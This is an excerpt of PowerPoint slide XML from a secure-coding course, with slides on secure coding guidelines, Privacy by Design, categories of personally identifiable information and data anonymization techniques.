                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="2000" baseline="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" baseline="0"/>
            </a:lvl2pPr>
          </a:lstStyle>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#1</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Question #2</a:t>
            </a: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00000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflective Questions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260293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7"/>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 id="2147483953" r:id="rId25"/>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eadable.io/" TargetMode="Externa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cs.microsoft.com/en-us/windows/uwp/security/intro-to-secure-windows-app-development" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://clang.llvm.org/docs/UsersManual.html#command-line-options" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/content/documentation/Security/Conceptual/SecureCodingGuide/Introduction.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/C-Based_Toolchain_Hardening" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://resources.infosecinstitute.com/sdl-for-cc-code-in-visual-studio-2013-overview/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/topic/security/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owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="Externa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owasp.org/index.php/Technical_Risks_of_Reverse_Engineering_and_Unauthorized_Code_Modification" TargetMode="Externa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msdn.microsoft.com/en-us/library/ms233782.aspx" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/C-Based_Toolchain_Hardening" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/k3a3hzw7.aspx" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.debian.org/Hardening" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/dotnet/standard/security/secure-coding-guidelines" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/dotnet/framework/winforms/windows-forms-security"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Follow Best Practices for Secure Coding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Platform Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Privacy Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developing Secure Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1023548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EFC8F-AA75-41E0-B1A9-EBECA603CC55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3983C58-9099-46C7-9DBE-7D6C3FD67B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8460150" cy="5143430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reduce unnecessary complexity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write code to be read by humans (meaningful variable names, clear coding style, etc.).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use unit tests and comments to show and explain how code is intended to be used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For common tasks, use well-maintained/tested existing code, rather than creating new.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keep Python updated and patched.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review all third-party applications, code, libraries, and APIs to determine whether they are required, and whether they function safely. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use pyup.io to validate dependencies security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In declaration or before first use, explicitly initialize all variables and other data stores.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never pass user-supplied inputs directly to any dynamic execution function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure your compiler warnings are enabled to point out potential security problems and coding problems before you find them in testing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not enable your code to directly issue operating system commands, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>such as through command shells. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use task-specific APIs built into the programming language, standard libraries, or related tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not use pickle or yaml.load to deserialize any untrusted data. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use JSON or yaml_safe.load.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent users from modifying code, generating, or injecting new code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31950A5E-0D3B-4DB4-B0F4-5824D0DA5404}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Guidelines for Secure Coding—1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BE5B8A1-7C61-4C0A-A264-BC99019B9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26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riv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953000"/>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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Account for privacy throughout every development phase, as in Security by Design.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not simply protecting data, but designing software so data doesn't need protection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., avoid transferring data from the client to the server in the first place.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initially proposed by Ann Cavoukian, the Information &amp; Privacy Commissioner of Ontario, Canada, as a set of seven principles:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proactive not Reactive; Preventative not Remedial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privacy as the Default Setting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privacy Embedded into Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full Functionality—Positive-Sum, Not Zero-Sum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>End-to-End Security—Full Lifecycle Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Visibility and Transparency—Keep it Open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Respect for User Privacy—Keep it User-Centric</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privacy by Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269353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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="6197211" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To maintain privacy, personal identifiable information (PII) may need to be anonymized before it can be processed and analyzed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This means that the identity associated with personal data has been masked somehow so the data can be processed and analyzed without revealing the person associated with that data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data Anonymization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6894375" y="1035336"/>
            <a:ext cx="1986018" cy="5290182"/>
            <a:chOff x="6894375" y="1155288"/>
            <a:chExt cx="1986018" cy="5290182"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4100" name="Picture 4" descr="Image result for anonymou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375" y="2473435"/>
              <a:ext cx="1986018" cy="3972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2172" y="1155288"/>
              <a:ext cx="705642" cy="1569660"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="9600" dirty="0">
                  <a:latin typeface="Segoe UI Black" panose="020B0A02040204020203" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI Black" panose="020B0A02040204020203" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI Black" panose="020B0A02040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2699475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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1302040"/>
            <a:ext cx="6820873" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify any information that is sensitive, and apply appropriate controls to ensure it remains private. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider all personally identifiable information (PII) sensitive, as it can be used to establish a person's identity and might be used to cause them substantial harm, embarrassment, inconvenience, or unfairness. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Refer to privacy guidelines for your country, municipality, or organization for specific lists of PII you may be legally required to protect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A typical list includes:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Sensitive Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4649355" y="3854248"/>
            <a:ext cx="3576338" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>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a:t>Biometric identifiers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Citizenship or immigration status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Medical information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ethnic or religious association</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sexual orientation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Account passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Date of birth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Criminal history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mother's maiden name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="3854248"/>
            <a:ext cx="3470016" cy="2371835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Home address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phone number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social Security number</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(even if it's just the last 4 digits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Driver's license or state ID#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passport number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alien registration number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Financial account number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27A01413-3169-49FD-91E9-ADA43FCA3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69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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1302040"/>
            <a:ext cx="6820873" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use one of the following techniques to mask the identifying data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Replacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Substitute any values that could be used to identify the user with different values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Suppression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Omit (all or in part) any values that could be used to identify the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Generalization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Substitute specific values that could be used to identify the user with something less specific. For example, generalize the date of birth to the year or decade in which the user was born.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Perturbation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Make random changes to the data to corrupt values that could be used to identify the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anonymize non-sensitive data as well, if it could be used for the reverse anonymization of sensitive data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that the masking process is not reversible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that the same masking process will produce the same results each time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that data types remain compliant with the schema.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preserve the meaning of the data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anonymize Personal Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>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310327B8-6A65-4053-974A-9F20C6698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79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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1302040"/>
            <a:ext cx="6820873" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The system operator may expose data. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
